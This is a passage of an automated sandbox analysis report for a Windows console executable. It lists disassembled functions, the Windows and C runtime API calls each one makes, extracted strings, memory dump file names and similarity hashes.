                                                                                                                                                                                                                          • Instruction ID: 32af1070164af80c44d921672e8685eda0361f181af1dac0ce71c663b451ccba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 689775aedb3cab57611d593e4167bad485f37e8b5984ae6858c0d72a81785d55
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF0F67534132237F63112691C49F17698C8B81F32F26463EFB14B92D4DE81941042A6
                                                                                                                                                                                                                          Function 010978E0 Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetThreadErrorMode.KERNEL32(00008001,00000000), ref: 01097919
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: LoadLibraryExW.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 0122CE91
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: GetLastError.KERNEL32 ref: 0122CE9F
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: SetLastError.KERNEL32(00000000), ref: 0122CFD4
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 01097934
                                                                                                                                                                                                                          • SetThreadErrorMode.KERNEL32(00000000,00000000), ref: 0109794E
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 01097955
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Last$ModeThread$LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3861856538-0
                                                                                                                                                                                                                          • Opcode ID: 6783d771dcac7a4889015fb15c6cc57c94424b187cd26dc862f903df37a78b73
                                                                                                                                                                                                                          • Instruction ID: 30d39c3b9ea95427bae8363c615e8403d73e3d394b5a33129ee786ba2577b236
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6783d771dcac7a4889015fb15c6cc57c94424b187cd26dc862f903df37a78b73
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D019275901219AFDB20CF58DD09BAEBBB8EB04725F11026EE811E33D0D7741904CB91
                                                                                                                                                                                                                          Function 01128840 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000006,0000002C,?,0141AE3C), ref: 01128848
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 01128855
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000008), ref: 01128868
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000008), ref: 0112887B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$FileSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3064237074-0
                                                                                                                                                                                                                          • Opcode ID: b84a11a7305490412e832e3d665e1f8b946909588018a9ae2ba7af2ea72891e2
                                                                                                                                                                                                                          • Instruction ID: ec3135ba27c150087a8158f895d307dc5fc4130acda18bc82c67ba4bd1316ca1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b84a11a7305490412e832e3d665e1f8b946909588018a9ae2ba7af2ea72891e2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEE06D7A6011205ED628277CB90869A6298EB44637F12472DFAB2E12E4EB7088209752
                                                                                                                                                                                                                          Function 010D53C0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _swprintf
                                                                                                                                                                                                                          • String ID: {%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                                                                                                                                                                                                          • API String ID: 589789837-128308884
                                                                                                                                                                                                                          • Opcode ID: 417d4ae41c4779fcb3647cb4443d8beaacc5dfb6453376037d89d0d4e3c42326
                                                                                                                                                                                                                          • Instruction ID: aa037a7191b7dce7d83338e68a1ab34d88db0d0524795eeb0d4408e76f02d1ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 417d4ae41c4779fcb3647cb4443d8beaacc5dfb6453376037d89d0d4e3c42326
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0719BB1A40308EBEB20CF98CC59B9EBBB5EF48714F104069EA55BB3D0DBB55905CB51
                                                                                                                                                                                                                          Function 0116D410 Relevance: 5.4, APIs: 4, Instructions: 407memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0116D5E6
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0116DA2C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,?,?), ref: 0116DA45
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,?,?), ref: 0116DA5E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 5b185ba77cb3692e6d0f9ec76afd9022990b9024dfafb8064864d3aacb5281e7
                                                                                                                                                                                                                          • Instruction ID: e812bf9ba52518b7f7e1689e4c857e8eaf524b542b6b50faaf9a9a26d1cdbfd4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b185ba77cb3692e6d0f9ec76afd9022990b9024dfafb8064864d3aacb5281e7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2026DF1E002299BEB60CF58CC80B9EBBB9BB44314F0541D9DA49A7381D7759E94CF98
                                                                                                                                                                                                                          Function 012428C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 012428F6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • D::HIPCE: finished handling event, xrefs: 012440FF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentThread
                                                                                                                                                                                                                          • String ID: D::HIPCE: finished handling event
                                                                                                                                                                                                                          • API String ID: 2882836952-1184478874
                                                                                                                                                                                                                          • Opcode ID: 8377133b89cb989dc2938fd4922ca4595128f86b07c54325367a049d4209d383
                                                                                                                                                                                                                          • Instruction ID: 69b8559a8c93ea044f24cfcd9b3adc39d2788662dd560bd6ce3c4b44c1d1d776
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8377133b89cb989dc2938fd4922ca4595128f86b07c54325367a049d4209d383
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E412274920286DFEF399FA9E4857AEBBB0BF15304F14416EE9289B283C7B48454CB51
                                                                                                                                                                                                                          Function 0121C3E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateErrorInfo.OLEAUT32(?,7CAB6A82,?,?,?), ref: 0121C446
                                                                                                                                                                                                                          • SetErrorInfo.OLEAUT32(00000000,?,?,?,?,?,?), ref: 0121C564
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorInfo$Create
                                                                                                                                                                                                                          • String ID: complib.hlp
                                                                                                                                                                                                                          • API String ID: 3127274525-2623185511
                                                                                                                                                                                                                          • Opcode ID: 65e020f41363513df39e667a6e7dcaed95a88167672fdda1b71b2d1d6b38cb2c
                                                                                                                                                                                                                          • Instruction ID: 8b189989f40549e3333aacd1711895d0c842bc20c751330650525e7f4cc28e13
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65e020f41363513df39e667a6e7dcaed95a88167672fdda1b71b2d1d6b38cb2c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22415B75A00219AFCB04DF98D854B9EBBF9EF48621F25005AE905F73A0DB75AD01CBA1
                                                                                                                                                                                                                          Function 0122BDA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000002,_CorExeMain,?,00000000,?,?,?,00000000,?,?,0122BD2B,?,00000000,?,00000080), ref: 0122BEA3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _stricmp
                                                                                                                                                                                                                          • String ID: _CorDllMain$_CorExeMain
                                                                                                                                                                                                                          • API String ID: 2884411883-474217011
                                                                                                                                                                                                                          • Opcode ID: bad89608340d224a019530b33b1b598d0cf2c24d5734125895febbc8fba4dabc
                                                                                                                                                                                                                          • Instruction ID: fb34b678519ad9160b2fc7e3ff7dcd75080a0589b64f1977a7dabd20fb44ac3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bad89608340d224a019530b33b1b598d0cf2c24d5734125895febbc8fba4dabc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E731D93132023A7BDB1A8B1CD890B7EB79FAF50315B9D8429DB059B343DB71E8408794
                                                                                                                                                                                                                          Function 010111B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 01011287
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,00000000), ref: 0101129B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CodeExitObjectProcessSingleWait
                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                          • API String ID: 1680577353-2746444292
                                                                                                                                                                                                                          • Opcode ID: 303c11425e6852e7277d9d247384debceb8faa34d152359c4dfc8392fe8aa2ec
                                                                                                                                                                                                                          • Instruction ID: 6204fcf8c1b1676b569cdf005868db0663b002639191586683149dc91a5a61ce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 303c11425e6852e7277d9d247384debceb8faa34d152359c4dfc8392fe8aa2ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB3105B5D00209EFDB10DFA8D945BDEBBF8EB08314F1041AAE914A7290D7795A09CF95
                                                                                                                                                                                                                          Function 012384A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(7CAB6A82,03C160C0,?,?), ref: 012384E2
                                                                                                                                                                                                                          • RaiseException.KERNEL32(04242420,00000000,00000003,'YA1), ref: 01238545
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerExceptionPresentRaise
                                                                                                                                                                                                                          • String ID: 'YA1
                                                                                                                                                                                                                          • API String ID: 1899633966-3346015194
                                                                                                                                                                                                                          • Opcode ID: 68dfd3de59e4f4c7f927f78cf877c30b967e3321572820a6d59948a03850be9a
                                                                                                                                                                                                                          • Instruction ID: e596e74f7c4522d513b82b2b6ae5fbc5d025facec7a7f830a3529f9e4b6ba8f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68dfd3de59e4f4c7f927f78cf877c30b967e3321572820a6d59948a03850be9a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 522115B4D01249EFDB10CFA9D955BDEBBB4EB09724F10416EE905AB380D7756A04CB90
                                                                                                                                                                                                                          Function 0122A820 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01215D00: GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0122A8C3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82), ref: 0122A8F7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • D:\a\_work\1\s\src\coreclr\vm\threads.cpp, xrefs: 0122A835
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateFileFreeModuleNameProcess
                                                                                                                                                                                                                          • String ID: D:\a\_work\1\s\src\coreclr\vm\threads.cpp
                                                                                                                                                                                                                          • API String ID: 1759625101-1819033804
                                                                                                                                                                                                                          • Opcode ID: 405e65fb3075de1825e55777b9ca077c31a4d2517be0e9194fc37534acf24fbf
                                                                                                                                                                                                                          • Instruction ID: 5b1b249b043a94f100e4a5cec24b4d88bfbb3d11518e34c9f3c818398dc7bac5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 405e65fb3075de1825e55777b9ca077c31a4d2517be0e9194fc37534acf24fbf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E12147B090034AEBEB10CFA9D909BEEBBF4FB44718F204619E525A7390D7B91604CB91
                                                                                                                                                                                                                          Function 012D1380 Relevance: 5.3, APIs: 4, Instructions: 254COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,?,?), ref: 012D144C
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,?,?), ref: 012D1700
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
